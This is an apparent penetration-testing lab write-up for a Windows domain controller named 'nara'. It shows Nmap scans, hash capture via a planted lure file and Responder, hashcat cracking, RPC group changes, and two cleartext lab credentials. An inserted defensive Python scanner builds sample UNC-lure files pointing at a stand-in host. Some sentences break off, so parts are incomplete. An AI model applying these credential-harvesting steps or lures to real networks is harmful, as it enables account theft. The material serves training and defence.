nara
2025-3-27
Date
Mar 23, 2025 → Mar 23, 2025
Tag
Nmap
Credential Harvesting
Privilege Escalation Techniques

192.168.140.30

Nmap

└─# nmap -sT -p- --min-rate 5000 $ip
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-03-23 06:49 EDT
Stats: 0:00:00 elapsed; 0 hosts completed (1 up), 1 undergoing Connect Scan
Connect Scan Timing: About 2.14% done; ETC: 06:49 (0:00:00 remaining)
Nmap scan report for 192.168.140.30
Host is up (0.066s latency).
Not shown: 65511 filtered tcp ports (no-response)
PORT      STATE SERVICE
53/tcp    open  domain
88/tcp    open  kerberos-sec
135/tcp   open  msrpc
139/tcp   open  netbios-ssn
389/tcp   open  ldap
445/tcp   open  microsoft-ds
464/tcp   open  kpasswd5
593/tcp   open  http-rpc-epmap
636/tcp   open  ldapssl
3268/tcp  open  globalcatLDAP
3269/tcp  open  globalcatLDAPssl
3389/tcp  open  ms-wbt-server
5985/tcp  open  wsman
9389/tcp  open  adws
49664/tcp open  unknown
49667/tcp open  unknown
49669/tcp open  unknown
49670/tcp open  unknown
49685/tcp open  unknown
49687/tcp open  unknown
49694/tcp open  unknown
49705/tcp open  unknown
49708/tcp open  unknown
49739/tcp open  unknown

Nmap done: 1 IP address (1 host up) scanned in 26.54 seconds

└─# nmap -sU -p- --min-rate 5000 $ip
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-03-23 06:49 EDT
Nmap scan report for 192.168.140.30
Host is up (0.064s latency).
Not shown: 65532 open|filtered udp ports (no-response)
PORT    STATE SERVICE
53/udp  open  domain
88/udp  open  kerberos-sec
123/udp open  ntp

Nmap done: 1 IP address (1 host up) scanned in 26.59 seconds

139,445

Nothing valuable found.
We try to access SMB with the account root:nara, which is able to log in.
I have checked nara; only this file can be found.
The content of this file means that everyone will click on files placed in this folder.
So we set up Responder to capture the hash from someone who clicks our hashgrab file.
We upload it and receive a hash from someone who clicks the file.
Then we run hashcat on the hash; we can also see that the hash type is
Got the password:
TRACY.WHITE:zqwj041FGX
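
A defender-side check for the lure file described above, as an added example that is not part of the original write-up: it scans a share for shortcut-style files whose contents reference a UNC path on a host outside an allow-list. The sample files, the hosts 192.0.2.10 and fs01, and all function names are constructed for illustration.

```python
import re
import tempfile
from pathlib import Path

# Shortcut-style file types that can carry a remote icon or target path.
LURE_EXTENSIONS = {".url", ".scf", ".lnk", ".library-ms", ".searchconnector-ms"}
# \\host\share at the start of a UNC path; host is a name or an IP address.
UNC_RE = re.compile(rb"\\\\([A-Za-z0-9._-]+)\\[^\\\s\x00]+")


def find_unc_lures(root, allowed_hosts=()):
    """Return sorted (relative path, host) pairs for remote UNC references."""
    allowed = {h.lower() for h in allowed_hosts}
    hits = set()
    for path in Path(root).rglob("*"):
        if not path.is_file() or path.suffix.lower() not in LURE_EXTENSIONS:
            continue
        # Dropping NUL bytes lets one ASCII regex also match UTF-16LE text.
        data = path.read_bytes().replace(b"\x00", b"")
        for match in UNC_RE.finditer(data):
            host = match.group(1).decode("ascii").lower()
            if host not in allowed:
                hits.add((path.relative_to(root).as_posix(), host))
    return sorted(hits)


def build_sample_share(root):
    """Constructed sample files; 192.0.2.10 and fs01 are made-up hosts."""
    root = Path(root)
    (root / "docs").mkdir()
    (root / "docs" / "@important.url").write_text(
        "[InternetShortcut]\nURL=https://example.com/\n"
        "IconFile=\\\\192.0.2.10\\share\\icon.ico\nIconIndex=1\n")
    (root / "docs" / "desktop.scf").write_bytes(
        "[Shell]\nCommand=2\nIconFile=\\\\192.0.2.10\\share\\x.ico\n".encode("utf-16-le"))
    (root / "intranet.url").write_text(
        "[InternetShortcut]\nIconFile=\\\\fs01\\icons\\site.ico\n")
    (root / "notes.txt").write_text("see \\\\192.0.2.10\\share\n")


def demo():
    with tempfile.TemporaryDirectory() as tmp:
        build_sample_share(tmp)
        return find_unc_lures(tmp, allowed_hosts={"fs01"})


if __name__ == "__main__":
    for rel_path, host in demo():
        print(f"{rel_path}: references \\\\{host}")
```
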
We attempt to use the credentials to access port 5985, but it fails.
Since the account is not a member of the remote management group, we can use RPC to add it.
Successful.

PE

We found this hash, but are not sure what it is.
Jodie.Summers:hHO_S9gff7ehXw
Got it.